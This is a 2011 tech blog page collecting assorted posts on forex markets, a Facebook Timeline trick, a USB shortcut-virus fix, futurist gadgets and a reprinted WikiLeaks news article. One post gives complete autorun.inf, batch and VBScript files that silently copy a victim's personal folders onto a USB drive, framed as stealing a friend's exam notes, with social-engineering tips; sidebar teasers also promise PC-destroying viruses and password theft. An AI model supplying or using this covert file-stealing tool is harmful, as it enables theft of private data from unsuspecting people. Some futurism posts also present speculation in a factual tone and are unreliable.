Wikileaks Under Attack

The WikiLeaks website crashed Tuesday in an apparent cyberattack after the accelerated publication of tens of thousands of once-secret State

Destroy Ur Friends PC Using Virus

In this post we'll take a look on how to create a deadly computer virus to destroy your enemy or victim's PC.

USB 3.0 Evolution xD

USB 3.0 > Usb 2.0 > Usb 1.0 xD

MEet Top ten techies Who changed World around Us

Top Ten Techies...

Steal Your Frnds Password using Flash Drive

Yes Ew Heard it Correct...CLick to know the trick :)

Wednesday 28 September 2011

About Foreign Exchnage

Foreign exchange market


The foreign exchange market (forex, FX, or currency market) is a global, worldwide decentralized financial market for trading currencies. Financial centers around the world function as anchors of trading between a wide range of different types of buyers and sellers around the clock, with the exception of weekends. The foreign exchange market determines the relative values of different currencies.

The primary purpose of the foreign exchange is to assist international trade and investment, by allowing businesses to convert one currency to another currency. For example, it permits a US business to import British goods and pay Pound Sterling, even though the business' income is in US dollars. It also supports direct speculation in the value of currencies, and the carry trade, speculation on the change in interest rates in two currencies.
In a typical foreign exchange transaction, a party purchases a quantity of one currency by paying a quantity of another currency. The modern foreign exchange market began forming during the 1970s after three decades of government restrictions on foreign exchange transactions (the Bretton Woods system of monetary management established the rules for commercial and financial relations among the world's major industrial states after World War II), when countries gradually switched to floating exchange rates from the previous exchange rate regime, which remained fixed as per the Bretton Woods system.

The foreign exchange market is unique because of
its huge trading volume representing the largest asset class in the world leading to high liquidity;
its geographical dispersion;
its continuous operation: 24 hours a day except weekends, i.e. trading from 20:15 GMT on Sunday until 22:00 GMT Friday;
the variety of factors that affect exchange rates;
the low margins of relative profit compared with other markets of fixed income; and
the use of leverage to enhance profit and loss margins and with respect to account size.

As such, it has been referred to as the market closest to the ideal of perfect competition, notwithstanding currency intervention by central banks. According to the Bank for International Settlements, as of April 2010, average daily turnover in global foreign exchange markets is estimated at $3.98 trillion, a growth of approximately 20% over the $3.21 trillion daily volume as of April 2007. Some firms specializing on foreign exchange market had put the average daily turnover in excess of US$4 trillion.

The $3.98 trillion break-down is as follows:
$1.490 trillion in spot transactions
$475 billion in outright forwards
$1.765 trillion in foreign exchange swaps
$43 billion Currency swaps
$207 billion in options and other products

Saturday 24 September 2011

How To Get Facebook’s Timeline Without The Wait

Yesterday Facebook announced the new profile, timeline, but the beta version doesn’t won’t come out until at least the end of this month, if not later, and you have to sign up for it in advance — but, there’s a way to activate it right now, without the wait.

Facebook gives developers early access to timeline so they can develop applications for it. However, you don’t really have to be a real developer, just pretend to be one! Here’s how.

Step 1: Start Facebook’s Developer Application

Facebook has a page, a group and an application called Developer — you want to click on the app, which you can find here [https://developers.facebook.com/apps/]. If you’ve never used this app before, you’ll need to allow it to access your basic information, the same way you would when launching anything else for the first time on Facebook.
After you’ve installed the Developer tool, click on “create a new app,” a button that appears in the top right corner of the screen.

Step Two: Make Up A Name

Developer asks you to provide some information about this app you just clicked the create button for. A pop-up asks you to input a display name and a namespace, and two of them can’t be exactly the same. It’s simplest to type in your full name for the first field and then in the second area, type it in without any spaces between words.
Then a security popup window pops up, asking you to type in the letters you see.

Step Three: Launch Open Graph

 
Within the left-hand column, click on the words “open graph.”
Fill out two different verbs. You can use “get profile” or choose whatever you want.

Now you’re almost done.
After a few minutes, your profile will display a notification across the top suggesting you try timeline.
Click “get it now” and start playing with your timeline.

Notice the upgrade is irreversible, so don’t shoot the messenger if you don’t like it.
Until the beta version of timeline becomes available to non-developers — Facebook says this will happen on September 30 — only people who’ve upgraded their profiles to timelines will be able to see your timeline.
Readers, have you upgraded your profile to timeline yet? If so, did you do anything creative with your cover photo? Please share your experiences in the comments section.

 


Sunday 18 September 2011

Fix External/Flash Drive Folders Changed to Shortcuts Virus


Some Viruses changes our files on our Flash Drive or External Hard Drive changed into Shortcuts. We can’t open the files from our Pen/Thumb drives. Many people are getting this Virus from their Work Place and Losing their Data. How do i get my files back so that I can view them? Most viruses delete the “Folder options” menu and “Task Manager” as well.

Solution to Fix External/Flash Drive Files Changed into Shortcuts :

The good side of these viruses is that they don’t delete the actual content. It was just hide in our Flash Drive. We can easily recover all the files.
Step 1: If you are affected by Shorcut Viruses,Do not format your Flash or External Drive. If you format you can’t Recover it.
Step 2: Check your Flash Drive’s Drive Letter ( Example : I: or K:)
Pen Drive Shorcut Virus
Step 3: Click on “Start” –>Run–>type “cmd” and click on OK
Step 4: If your Flash Drive Letter is K: then Type the below command in your “cmd” and Press “Enter
attrib -h -r -s /s /d k: *.* (Check the screenshot ) Note : Replace the letter k: with your flash drive letter
Remove Pen Drive Shorcut Virus
Step 5 : Now your files will be visible.Make sure to keep the antivirus up-to-date to prevent viruses.

Sunday 11 September 2011

Virtual Reality Technology



Exponential growth in computer power is enabling the creation of exceedingly lifelike graphics and 3D environments. At the same time, faster broadband is opening up new frontiers in cyberspace, allowing the development of Web 3.0 - 


the next generation of Internet. Combined with developments in on-person hardware, this is leading to a rebirth of virtual reality. Having been something of a gimmick in the 1990s, it is now becoming a serious tool for business, leisure, education and training.

Much of the content in these environments is user-generated, with online communities for sharing and exchanging virtual objects, buildings, avatars, etc.
For the wealthy, some of the hardware options now available include pod-like structures which are fully enclosing and respond to a variety of gesture commands

Web 4.0 the future of Internet landscape






Further convergence of the online and physical world has led to the emergence of "Web 4.0" - the next generation of internet. Semantic analyzing programs, having evolved into forms of AI, now perform a huge range of automated tasks for business, government and consumers. Running on massively parallel networks, these applications hunt for textual and visual data - combining the most subtle capabilities of humans (such as pattern recognition) with ways in which machines are already vastly superior (such as speed and memory).


In addition to serving as highly advanced search engines, they are playing a major function in the real world - gathering information from the array of sensors, cameras and other tracking devices now present in the environment, on vehicles, and even on people themselves.
Although privacy and civil liberties issues are being raised, this new generation of IT promises to bring enormous benefits to society. Crimes are faster and easier to solve thanks to these intelligent virtual agents; transport and logistics are smoother and more efficient; resources can be managed and distributed more accurately.


In addition, practically every physical document in existence has now been digitally encoded, backed up and archived online. This includes full copies of all books, journals, manuscripts and other literature ever published – forming a complete repository of human knowledge going back thousands of years. These documents can be retrieved and analysed using real-time speech commands, translated from any of the world's 6,000 languages and accessed via 3D holographic imaging.


Web 4.0 is also democratising the Internet more than ever before. News agencies are finding themselves increasingly outmoded by bloggers and other social media when it comes to speed and accuracy of information.




The iPhone of 2020



Designer Josselin Zaïgouche, who created the Zero Phone we’ve shown you half an year ago has now sent us an incredible design, the Apple Black Hole concept, possibly the iPhone of the year 2020. “What’s going to happen in 10 years” asks the designer and the answer should look something like this
As you can see, the Apple Black Hole comprises 4 components: the charging base, the Prism, the Black Hole and the giftbox. Things get interesting when you try to use the handset… its central ball will levitate when you open your hand and all functions will be controlled in mid-air, with the aid of holographic technology. How cool is that?
The Black Hole concept phone can be connected to the charging base and used as a desktop device, still projecting the needed interface. Brilliant? Yes! Viable? Maybe…

Practical flying cars





Anti-gravity propulsion has been under development for almost a century now.* Initially seen in military applications, it eventually found its way to the consumer market. Here, it began showing up in various luxury items and devices, such as hoverboards and floating recliners.
Further refinement of this technology - together with advances in AI, microjets and collision avoidance systems - has led to the dawn of a new era in personal transportation. In the late 2070s, it is not uncommon to see what citizens of earlier decades might describe as "flying cars" moving through cities.


In fact, these are light-duty vehicles based on earlier military VTOL (Vertical Take-Off and Landing) craft, but with slimmed down functionality and costs. They come in a variety of models and sizes, but are typically around 4 metres wide, and limited to a maximum of one or two passengers. By the end of this decade, they are becoming cheap, safe and numerous enough to be regarded as a mainstream form of transport.





The craft have a number of advantages over established forms of mobility. Since they float above the ground, they can access terrain and environments that would easily defeat traditional automobiles. This makes them popular with adventurers and explorers. They are also substantially faster than normal cars, able to reach several hundred kilometres per hour if necessary. They are more versatile and manoeuvrable than aeroplanes and can utilise a much greater volume of airspace. Since the traffic they generate is decentralised and there is so much available airspace, this makes them safer than both cars and aeroplanes, too. Collisions are almost unheard of, in any case, due to the onboard software and AI.
In addition, they use considerably less fuel than earlier forms of transport and require less maintenance.



Some of the more expensive models are capable of reaching low Earth orbit for short periods. Others feature striking designs, often personalised by their owner - such as holographic decals and other accessories. These craft are being used by many businesses too (especially for rapid delivery of goods), as well as police and ambulance crews.
Further developments in anti-gravity will lead to bigger, more sophisticated versions - including recreational vehicles serving as truly mobile homes. Many previously inaccessible parts of Earth will become inhabited thanks to this, such as mountains and remote islands.

The Multi-touch surface computing



These coffee table-sized devices have been appearing in business venues for a couple of years already. They are now becoming cheap enough for the consumer market.
This computing platform responds to natural hand gestures and real world physical objects. It has a 360-degree user interface and a large reflective surface, with projectors underneath which project images onto its underside. Cameras in the machine's housing record reflections of infrared light from objects and fingertip movements.



The surface is capable of object recognition, object/finger orientation recognition and tracking, and is multi-touch and is multi-user. Users can interact with the machine by touching or dragging their fingertips and objects such as paintbrushes across the screen, or by placing and moving placed objects. The platform can respond to over 50 touches at a time.
The use of multi-touch technology is increasing exponentially during this time. For example, sales of touchscreen phones will rise from 200,000 in 2006 to over 21 million by 2012, while iPads and other tablet devices are seeing similar growth.


iMove Electric Car Gives The Touch Of Apple Into Future Transportation




iPod. iPhone.. iPad… What else do you expect from Apple in future? Thinking of another high-tech handheld gadget? Why don’t think something beyond your imagination, iMove?

iMove is an electric car concept that has been specifically designed to be driven in the future streets by those who are already using various innovative Apple products. Design of the car was inspired by the Macintosh mouse, giving an open and cabriolet feel to the riders when driving. Accessing the car is super fun and stylish. The pyramidal shaped glass receptors have been placed on the roof that charges the electronic dashboard of the car. The back of the car is made of elastic textile materials that can hold the luggage underneath tightly. The exterior transparent area contains photocromic materials that enable the car to change its appearance in various situations

Android to overtake iPhone app downloads for first time


An analyst house is predicting that 2011 will see Android overtake iOS devices in app downloads for the first time.
Ovum has estimated that downloads from Android devices will hit 8.1 billion by the end of 2011, while iOS apps will languish at 6 billion downloads.
But it's not all devastating defeat for Apple – its iOS app downloads will have grown by almost three times compared to 2010 when it shifted only 2.7 billion downloads.
But the explosion of growth is all the greater for Android, which saw only 1.4 billion downloads in 2010.


Big figs

The total app downloads is predicted to come in at 18 billion by New Years' Eve – that's a massive leap from 2010's total app downloads which came in at a relatively paltry 7.4 billion.
It's middling news for Microsoft's Windows Phone platform; Ovum predicts that the Windows Phone OS will overtake BlackBerry to take third place in both the number of app downloads and app revenues - but only by 2015.
Ovum's predictions tally with those of another analyst, Strategy Analytics, which predicts that the Android Market is set to surpass the Apple App Storeby 2012.
Want to give iOS a last minute boost? Get downloading the 10 best free apps for iPhone, as detailed in the video below:


Friday 9 September 2011

Convert Font File Types the Easy Way



The Internet is loaded with free fonts, but the file types for these free fonts are not always compatible with our favorite software. Even more, if we decide to change from PC to Mac, or vice verse, it is hard to move our font collection without file type conflicts.
A great service called FontConverter.org converts fonts from one file type to another almost instantly.


To use FontConverter, click the button in the middle of the page that says Choose File and open the font file you wish to convert.




After making your selections, click Send File.


Within seconds your new font file is processed and ready to download. Right Click the file name and choose Save As to save the file.


FontConverter is a no-frills solution for converting font files. It works quickly, with no unnecessary features. Overall, we are very pleased with this service—and our newly converted fonts!

Sunday 4 September 2011

Speed Up Your Home With 4 THz







February 14, 2025 - Today is the release of the first home computer with the new 4 THz microprocessor, currently the highest performing processor available. Several analysts have doubted of the need of the 4THz processor for the home market, but the pre-sale for the last couple of weeks look positive according to the manufacturer.






The computer has the 100TB memory drive that became standard about 5 years ago, basically because the lack of interest in more storage for home computers. It's nice that they have included 1,000 movies in the package but as you can guess they are not the latest releases.


It has 512 GB RAM memory, the size of the box is 10.3" x 7.9" x 1.2" (WxDxH) and it is of course compatible with all the wireless screens that you have at home. The introduction price is set to US$ 399.

Argument: According to Moore's Law the number of transistors that could be placed on a computer chip would double every 18 months which has been the case since the 1970s. Gordon Moore has though revised his law since then which could give us a microprocessor of 4 THz by 2025.


Questions: Will there be need for more than 100 TB storage memory for the home market? What else can drive the development of home computers than moving images, as in movies and games?




Adi

Saturday 3 September 2011

Pen pc

Subject: FW: Amazing Technology from Japan!

I must have one of these



Look closely and guess what they could be...



Are they pens with cameras?



Any wild guesses? No clue yet?

Ladies and gentlemen... congratulations!
You've just looked into the future... yep that's right!

You've just seen something that will replace your PC in the near future.

Here is how it works:



In the revolution of miniature computers, scientists have made great developments with bluetooth technology...

This is the forthcoming computers you can carry within your pockets



This "pen sort of instrument" produces both the monitor as well as the keyboard on any flat surfaces from where you can carry out functions you would normally do on your desktop computer.





Can anyone say, "Goodbye laptops!"

Looks like our computers are out of date..again!

How to secretly copy (steal) files from a computer to a USB Flash drive




Let’s say you and your friend are preparing for an all important exam that is going to decide the course the rest of your life takes. Your friend has some important notes on his computer that he isn’t going to share with you. Your friend is a moron. You need the notes so badly that you are willing to steal from him. He deserves it anyway.







To get the notes you can either break into his house at night, an accomplice keeps you hanging by a rope from the roof while you deliberately copy the files to your flash drive taking care not to let your feet touch the floor. Or you can walk into his room one morning and say with a feigned smile, “Hey, buddy! I have some great new music. Want it?”. Then plug your USB Flash drive into his PC to automatically copy his notes to your pen drive, secretly and silently. Copy the songs you brought to his PC to complete the act.


Sneaky, isn't it? So let us prepare such a sinister USB Flash drive.
STEP 1


Open Notepad (I recommend Notepad++) and copy-paste the following lines.


[autorun]

icon=drive.ico

open=launch.bat

action=Click OK to Run

shell\open\command=launch.bat


Save this as autorun.inf


The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.


The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.


The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.
STEP 2


Open Notepad again and copy-paste the following lines


@echo off

:: variables

/min

SET odrive=%odrive:~0,2%

set backupcmd=xcopy /s /c /d /e /h /i /r /y

echo off

%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"

%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"

%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"

@echo off

cls


Save this as file.bat


This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.


The first file path "%USERPROFILE%\pictures" – is the target.

The second file path "%drive%\all\My pics" – is the destination.
STEP 3


Open Notepad once again and copy-paste the following line.


CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False


Save this as invisible.vbs


This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.
STEP 4


Open Notepad one last time and copy-paste the following line.


wscript.exe \invisible.vbs file.bat


Save this as launch.bat


This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.
STEP 5


Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.


This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.

WikiLeaks site is under attack








The WikiLeaks website crashed Tuesday in an apparent cyberattack after the accelerated publication of tens of thousands of once-secret State Department cables by the anti-secrecy organization raised new concerns about the exposure of confidential U.S. embassy sources.


"WikiLeaks.org is presently under attack," the group said on Twitter late Tuesday. One hour later, the site and the cables posted there were inaccessible.


WikiLeaks updated its Twitter account to say that it was "still under a cyberattack" and directed followers to search for cables on a mirror site or a separate search system, cablegatesearch.net.


The apparent cyberattack comes after current and former American officials said the recently released cables — and concerns over the protection of sources — are creating a fresh source of diplomatic setbacks and embarrassment for the Obama administration. It was not immediately clear who was behind the attack.


The Associated Press reviewed more than 2,000 of the cables recently released by WikiLeaks. They contained the identities of more than 90 sources who had sought protection and whose names the cable authors had asked to protect.


Officials said the disclosure in the past week of more than 125,000 sensitive documents by WikiLeaks, far more than it had earlier published, further endangered informants and jeopardized U.S. foreign policy goals. The officials would not comment on the authenticity of the leaked documents but said the rate and method of the new releases, including about 50,000 in one day alone, presented new complications.


"The United States strongly condemns any illegal disclosure of classified information," State Department spokeswoman Victoria Nuland said. "In addition to damaging our diplomatic efforts, it puts individuals' security at risk, threatens our national security and undermines our effort to work with countries to solve shared problems. We remain concerned about these illegal disclosures and about concerns and risks to individuals.


"We continue to carefully monitor what becomes public and to take steps to mitigate the damage to national security and to assist those who may be harmed by these illegal disclosures to the extent that we can," she told reporters.


Neither Nuland nor other current officials would comment on specific information contained in the compromised documents or speculate as to whether any harm caused by the new releases would exceed that caused by the first series of leaks, which began in November and sent the administration into a damage-control frenzy.


WikiLeaks fired back at the criticism even as its website came under cyberattack.


"Dear governments, if you don't want your filth exposed, then stop acting like pigs. Simple," the group posted on Twitter.


Some officials noted that the first releases had been vetted by media organizations who scrubbed them to remove the names of contacts that could be endangered. The latest documents have not been vetted in the same way.


"It's picking at an existing wound. There is the potential for further injury," said P.J. Crowley, the former assistant secretary of state for public affairs who resigned this year after criticizing the military's treatment of the man suspected of leaking the cables to WikiLeaks. "It does have the potential to create further risk for those individuals who have talked to U.S. diplomats. It has the potential to hurt our diplomatic efforts and it once again puts careers at risk."


Crowley set up a crisis management team at the State Department to deal with the matter and said officials at the time went through the entire collection of documents they believed had been leaked and warned as many named sources as possible, particularly in authoritarian countries, that their identities could be revealed. A handful of them were relocated, but Crowley said others may have been missed and some could not be contacted because the effort would have increased the potential for exposure.


The new releases "could be used to intimidate activists in some of these autocratic countries," he said. He said he believed that "any autocratic security service worth its salt" probably already would have the complete unredacted archive of cables but added that the new WikiLeaks releases meant that any intelligence agency that did not "will have it in short order."


WikiLeaks insisted it was "totally false" that any WikiLeaks sources have been exposed and appeared to suggest the group itself was not even responsible for releasing unredacted cables.


The group seemed to taunt U.S. officials and detractors in yet another Twitter message late Tuesday, asking what they will do "when it is revealed which mainstream news organization disclosed all 251k unredacted cables."


The AP review included all cables classified as "confidential" or "secret," among the more than 50,000 recently released by WikiLeaks. In them, the AP found the names of at least 94 sources whose identities the cable authors asked higher-ups to "protect" or "strictly protect." Several thousand other of the recently published cables were not classified and did not appear to put sources in jeopardy.


The accelerated flood of publishing partly reflects the collapse of the unusual relationships between WikiLeaks and news organizations that previously were cooperating with it in exchange for being given copies of all the uncensored State Department messages.


Initially, WikiLeaks released only a trickle of documents at a time from a trove of a quarter-million, and only after considering advice from five news organizations with which it chose to share all of the material. The news organizations advised WikiLeaks on which documents to release publicly and what redactions to make to those documents. The Associated Press was not among those news organizations.


In recent months, those relationships have soured noticeably. WikiLeaks complained Tuesday that a reporter who wrote about the group's efforts for The New York Times, one of the news organizations it was working with closely, was a "sleazy hack job." It also said a reporter for Guardian in Britain, another of its former partners in the release of documents, had exhibited a "tawdry vendetta" against WikiLeaks

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites